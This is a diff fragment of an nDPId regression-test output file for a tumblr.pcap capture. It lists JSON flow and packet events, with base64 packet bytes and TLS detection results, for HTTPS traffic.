b/test/results/tumblr.pcap.out 
@@ -1,274 +1,274 @@ 00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tumblr.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tumblr.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1605292102219} -00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292102219,"flow_last_seen":1605292102219,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292102219,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1605292102219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292102219,"pkt":"qtsDr8lk5EKm5WPyht1gCcfOACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3RABu9uJhiq5D+6LgBAB9a70AAABAQgKqXs\/nsLc288="} -00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292102602,"flow_last_seen":1605292102602,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292102602,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1605292102602,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292102602,"pkt":"qtsDr8lk5EKm5WPyht1gD4BTACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXidvHABuwi2Qd5sejoTgBAk6T9pAAABAQgKJEdEAsLc4vQ="} 
-00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292102603,"flow_last_seen":1605292102603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292102603,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1605292102603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292102603,"pkt":"qtsDr8lk5EKm5WPyht1gCYSFACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3UABuxOPqDR2fQOlgBAB9XmBAAABAQgKqXtBHsLc4vw="} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1605292102653,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292102653,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdELkP7ovbiYYrgBALf0cxAAABAQgKwt2S76l05rw="} 
-00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1605292102678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292102678,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdQHZ9A6UTj6g1gBALxQp7AAABAQgKwt2UBql09U8="} -00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292103804,"flow_last_seen":1605292103804,"flow_idle_time":7440000,"flow_min_l4_payload_len":664,"flow_max_l4_payload_len":664,"flow_tot_l4_payload_len":664,"flow_avg_l4_payload_len":664,"midstream":1,"thread_ts_msec":1605292103804,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:8c6e:cf2c:8d6:9fb5","src_port":41266,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-01390{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1605292103804,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":750,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":750,"pkt_l4_len":696,"thread_ts_msec":1605292103804,"pkt":"qtsDr8lk5EKm5WPyht1gDK9YArgGQCoBywEgSYsHmR3shSjf9ikmIAEWgA0AIYxuzywI1p+1oTIBu9ziFnW6Ce2BgBgB9Z0sAAABAQgKOMLyjsLdWyEXAwMCkwAAAAAAAAAEyttPIBHYl6fl6+wxakteQia67zuCx64sVbYiAEMKI1LRZB2ZjjRACezRfqMgcw8Wk8Ja+jFsbTh6PPGiWyRnZCafAJvoLbr\/QbtaCfYNT07cM7gv8MAYjagAz2\/uUXvHhHXYjVHplnNsW6sWSYWdjj7pK3cCYJyTWWk8KcaWVSPm5FJowuyKrEBg\/xvy4liO6V1qSsclVnGU5uOkFVqkiQyVPIXxSNOn3SjKKoV+GRhNjLSyOjDMf9ZrVDwqHvTDUwRZgkE5k6+v4Ngk9WrnV1ax1ubCqnHoIel2EK4gbfVvolwb83\/d3YNFV8lq1e+SHlYke+eJRKzjNIOw4b4Y36hRm5\/D2hks6V9vGkg6sSDzHRzniE1V4ce1mOtmNnefjf42UQc2HkOmWCkUVtMokEc166qSRXnlIooPlIQBw2b0stTzXYA2D5SN\/BALZmedX1SrmcVBJ4DrMf\/xHLEmuGaRjzLDgXIUB\/jHR45QJ7tyaECd\/R1pWTx+wCe3sS0fZlg4mB6GzVlIgWc0sXiXzk4KusTcJBlT6WCFzmZVXwOxGhq4mx\/Ar34HImolLoUFN3W4QPP1XuhLobsRn8+uu1UjAIOgrakq2nUZ7wxPjCRa6GR8HhsJaaSV8kQKCsWaODSJH8qsgcj27KMOqJKDEttTsUUejaBrXacD1ursBsQeG6kxeWCpc+pc+B6lF82QSaY+dqDc0x6adlVhzh25sn9xUc5gttNEqsRpcCwXleCFl5slq6Eo208ayh44XAy4\/3sSIcuuXZecriDdQNtCpH0D9WnZpbvC6F0uUd8YgEMLKpbVgkphXTjpgJPqNLHR1Jtsu8T0zduHUyA8I2rMdecA7vfO5m6vB6zg"} 
-00614{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292103804,"flow_last_seen":1605292103804,"flow_idle_time":7440000,"flow_min_l4_payload_len":644,"flow_max_l4_payload_len":644,"flow_tot_l4_payload_len":644,"flow_avg_l4_payload_len":644,"midstream":1,"thread_ts_msec":1605292103804,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::8fcc:d927","src_port":57286,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01367{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1605292103804,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":730,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":730,"pkt_l4_len":676,"thread_ts_msec":1605292103804,"pkt":"qtsDr8lk5EKm5WPyht1gC36AAqQGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACPzNkn38YBu3OPNREQMJOagBgB9f9ZAAABAQgKI0OBn8LdXfIXAwMCf+a7XKOkxtVKJI04EV4D3mT6IiNw5ZdwpK\/ctvLby5AnUtCRp1wz9iXgvd8CBQl59Ed1wqXQfvbQcvgr9o4GGMRVH8BPyBiK9wAHxfoair+VUOV+cUyNlvDKwuPaUh\/47DlY44LAL0vv9eo4G0vPSmnyuohMST6JkC52HBED7hDgCc5lbkYutM3P7xGL1Z5MrmmzLXVyM4doUQOUayCKfyqRux1EiZDMeHsdoHvinwuW98Zns+5LqMwEKiz9\/ZA1Iu594xbEmeMockAnjj3HmV8YsDERU2TzTk3sWn0ZhKp12Rdx11cVSOnv1ddUqmkYpF6VPIBgfZdY0+3WEYNWwp9gOeZ1SPKEW1sZa\/MZbqxYU+ge0aUNP414S6YsDr4wWnXY\/hrIPt4hdVJid3p8HC+BYX8NVuisAelA3CsslL+yrlEZs\/QElNY2EIBitMqJSsgpwlduIlvcGoykV3DYfMjS3smQ0\/HaV+vGuY59BD+HYzkVJoRFJ5+AoB\/9kz8MrwgQrulG8+mXwGs2Tz+e0pxggDcl3iaCIQO5yUqOapIz\/jo8gXQAUjpsoKRzsKjRY\/OKBL3cj5DbujlngZrs+3yRDxMp\/A8kmIYDSMjyy21do9HW47erPa0WwNSepOx56UCCZyny26AleUHgV47LLX+Hh0DKxyVNOlUl474o9ZULR18pA1FtXPbynHGzdWF0peqNAJdGXSpxCnSDK+dkiaw9fmAlL\/EwEDJgbnaFqYBoa1wzZSNmUTmn9uQt7gG5UTLglNz7Gtm2hHwfzEK4uAknhpJOuKuRvE3auX9h725wqrVluU5SCPoyvKwHHRb0nBQK3ngxp6Haaq8pgOXbmw=="} 
-00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1605292103806,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":132,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":132,"pkt_l4_len":78,"thread_ts_msec":1605292103806,"pkt":"qtsDr8lk5EKm5WPyht1gDK9YAE4GQCoBywEgSYsHmR3shSjf9ikmIAEWgA0AIYxuzywI1p+1oTIBu9ziGQ26Ce2BgBgB9dicAAABAQgKOMLykMLdWyEXAwMAKQAAAAAAAAAF+jUU1elIEFUi9UepC3cLGnJUpit7lClItBx8Gs+U4NeE"} -00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1605292103807,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292103807,"pkt":"qtsDr8lk5EKm5WPyht1gC36AAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACPzNkn38YBu3OPN5UQMJOagBgB9TxfAAABAQgKI0OBosLdXfIXAwMAIkCDsSUDRd2gtpG1ie0hMvlOrf1SL9AYeSm49w1LAyMVmmo="} -00615{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292103810,"flow_last_seen":1605292103810,"flow_idle_time":7440000,"flow_min_l4_payload_len":382,"flow_max_l4_payload_len":382,"flow_tot_l4_payload_len":382,"flow_avg_l4_payload_len":382,"midstream":1,"thread_ts_msec":1605292103810,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::98c7:1593","src_port":42908,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-01015{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1605292103810,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":468,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":468,"pkt_l4_len":414,"thread_ts_msec":1605292103810,"pkt":"qtsDr8lk5EKm5WPyht1gCmLwAZ4GQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACYxxWTp5wBu7LtL87ROW\/JgBgB9bw+AAABAQgKM4zEpsLdXIMXAwMBeeuGCWF9Lb0Ci6TEBMXMSCRU5\/ujX\/oVXdGh+BNpGjYWczn5t9MnrcPf0zR8Rsvgek65i+QCA5M9xg538hLyui9336X\/wmAqUKW0ovcGHfVkBbInk26LgYglI5Td\/ssdGWORhYySPbJXLEFtu\/h1mXhj5XU6VyNxU9SBh\/8O12l+trWyWdbANDOIW9SbvtVRvHBRVZmz1ag3okb4Plbrh4Qi4B+G74t5h0\/qMYjiEuZ1+PtpSHBW9OPbPwwcOV4UZ67nf4PG8vUha9JOewT6Ihb4Yfc7EBAGx7VHrcHsn7dvXiF8gTt9bh55AJVAbM2ak8Yu6DoJnJsa+jvwTKddiAxdtJhT3E7fBmbothroFA49N5AzGnFsh4cxhtIWJBj0s+8J1Phi\/75LUnCD0lYbxKIDoOKf0QWR08Jx8MCXKqwRPsjDU42Fi\/URG4BOwibUPBjlxMt8e\/Bx1zwNGX2TOl3lRdKcwrnMTh58G0mfgl41Ox0e5b1fEr4M"} -00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1605292103811,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292103811,"pkt":"qtsDr8lk5EKm5WPyht1gCmLwAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACYxxWTp5wBu7LtMUzROW\/JgBgB9W6tAAABAQgKM4zEp8LdXIMXAwMAIinMMkxOhnFjQLjLSAyia+Ge5bjIivBAhB3nTGih+nlOG64="} 
-00555{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1605292103882,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":132,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":132,"pkt_l4_len":78,"thread_ts_msec":1605292103882,"pkt":"qtsDr8lk5EKm5WPyht1gDK9YAE4GQCoBywEgSYsHmR3shSjf9ikmIAEWgA0AIYxuzywI1p+1oTIBu9ziGQ26Ce2BgBgB9dhQAAABAQgKOMLy3MLdWyEXAwMAKQAAAAAAAAAF+jUU1elIEFUi9UepC3cLGnJUpit7lClItBx8Gs+U4NeE"} -00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1605292103890,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292103890,"pkt":"qtsDr8lk5EKm5WPyht1gC36AAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACPzNkn38YBu3OPN5UQMJOagBgB9TwMAAABAQgKI0OB9cLdXfIXAwMAIkCDsSUDRd2gtpG1ie0hMvlOrf1SL9AYeSm49w1LAyMVmmo="} -00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1605292103902,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292103902,"pkt":"qtsDr8lk5EKm5WPyht1gCmLwAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACYxxWTp5wBu7LtMUzROW\/JgBgB9W5SAAABAQgKM4zFAsLdXIMXAwMAIinMMkxOhnFjQLjLSAyia+Ge5bjIivBAhB3nTGih+nlOG64="} 
-00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292104650,"flow_last_seen":1605292104650,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292104650,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1605292104650,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292104650,"pkt":"qtsDr8lk5EKm5WPyht1gBEqMACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABo9CrI3c4Bu\/+MQoWdXXNVgBAB9YSyAAABAQgKTYTpp8Lc6wE="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1605292104716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292104716,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAGj0KsgqAcsBIEmLB5kd7IUo3\/YpAbvdzp1dc1X\/jEKGgBAMSBTRAAABAQgKwt2b\/U1+nj4="} 
-00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":57,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292103810,"flow_last_seen":1605292105112,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":12081,"flow_avg_l4_payload_len":377,"midstream":1,"thread_ts_msec":1605292105112,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::98c7:1593","src_port":42908,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292103810,"flow_last_seen":1605292105112,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":12081,"flow_avg_l4_payload_len":377,"midstream":1,"thread_ts_msec":1605292105112,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::98c7:1593","src_port":42908,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00615{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105170,"flow_last_seen":1605292105170,"flow_idle_time":7440000,"flow_min_l4_payload_len":160,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":160,"midstream":1,"thread_ts_msec":1605292105170,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43420,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1605292105170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":246,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":246,"pkt_l4_len":192,"thread_ts_msec":1605292105170,"pkt":"qtsDr8lk5EKm5WPyht1gDdvHAMAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0oqZwBuzRq\/HZTRuvUgBgSELhfAAABAQgKdG+lysLdLW8XAwMAm7+VUv5v3n1cEKhvA7Obmk7hW69laavu9OZNOdP5v2aiE9LYEKQeHffn7vm6VstuW5LB+GPd1bdCCYxPrQ8cpXXvSrRBde7Ubgvulsw\/eGF6vJKgoYXL5h04lY18ojPm\/cV9tUPretg64t\/hG52\/jXKkQ9+5e1GR1KuJgn1MWQ\/97vN82J\/Jt388ivkqQMfP0T\/jvMqs33Elwytq"} -00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1605292105170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":237,"pkt_l4_len":183,"thread_ts_msec":1605292105170,"pkt":"qtsDr8lk5EKm5WPyht1gDdvHALcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0oqZwBuzRq\/RZTRuvUgBgSEKKhAAABAQgKdG+ly8LdLW8XAwMAazorJ+v8Qql\/1vWfAai2gkZCI3DTL5oADrcU2MSE9kWZdYS8Jqpk4fHfL5KS3jLCf57oTjL53SDsaGk+gIvtoan6S0MuUK39MyCSYP90lEM7cfvMMDv9MYZwBU7ADMu7jSPLRoIxvW6l0Cl8FwMDACLudklu9KmRe2M4B\/MpTRVuBpiUQvjz3VbQML7h4xLHHM4W"} 
-00615{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105171,"flow_last_seen":1605292105171,"flow_idle_time":7440000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":112,"midstream":1,"thread_ts_msec":1605292105171,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d28","src_port":43434,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1605292105171,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":198,"pkt_l4_len":144,"thread_ts_msec":1605292105171,"pkt":"qtsDr8lk5EKm5WPyht1gCnTDAJAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0oqaoBuwynxfpsKg54gBgd\/fuUAAABAQgKdG+ly8LdWR0XAwMAa1HIP\/vnAAogIw4J2B2TkEHONIFMeD5XyAVKi4Q2Vue2Mstte\/aj9aBEGnaC\/XLTSleNDPxB5FKFlYuKlZTTvSjcjRkZVdPHhikw9Xf3PTuX4sNc4A4aMrxDB+2xDdlSgUdvbOv4DPatYzp8"} -00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1605292105171,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292105171,"pkt":"qtsDr8lk5EKm5WPyht1gCnTDAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0oqaoBuwynxmpsKg54gBgd\/YTsAAABAQgKdG+lzMLdWR0XAwMAIlHp65gwK7PBPS\/ZXxVrtwWRv5u\/D1Oka\/7+0BiFD1N3mso="} 
-00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1605292105176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":197,"pkt_l4_len":143,"thread_ts_msec":1605292105176,"pkt":"qtsDr8lk5EKm5WPyht1gCnTDAI8GQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0oqaoBuwynxpFsKg54gBgd\/f4EAAABAQgKdG+l0cLdWR0XAwMAau+1WhRe96DKEz4O2DiVS\/91xsnWseh+6lrx3LgaqNmDXwRm1lqF7AcLtXkaV8D99qMpoGwTJnk5i4\/A5jdKnihSC+92twzKrr9YRFj27xUmeqz0tGED25O9+HkuuOkV2W5IN6Z8o+lbpTM="} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1605292105195,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292105195,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAMAATSgqAcsBIEmLB5kd7IUo3\/YpAbupnFNG69Q0av0WgBAMvoDtAAABAQgKwt2d3XRvpco="} 